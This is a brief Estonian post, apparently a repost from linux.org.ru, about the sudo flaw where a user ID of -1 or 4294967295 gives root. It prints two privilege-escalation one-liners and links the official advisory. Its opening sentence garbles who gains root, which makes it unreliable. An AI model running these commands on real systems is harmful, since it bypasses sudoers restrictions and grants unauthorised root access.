sudo viga võimaldab root kasutajal käivitada mistahes executablesi, kui /etc/sudoers failis on selle teised kasutajad lubatud ja rootile keelatud.
Vea ärakasutamine on väga lihtne:
sudo -u#-1 id -u
või:
sudo -u#4294967295 id -u
Viga esineb kõigis sudo versioonides kuni 1.8.28
Detailid:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Allikas: linux.org.ru
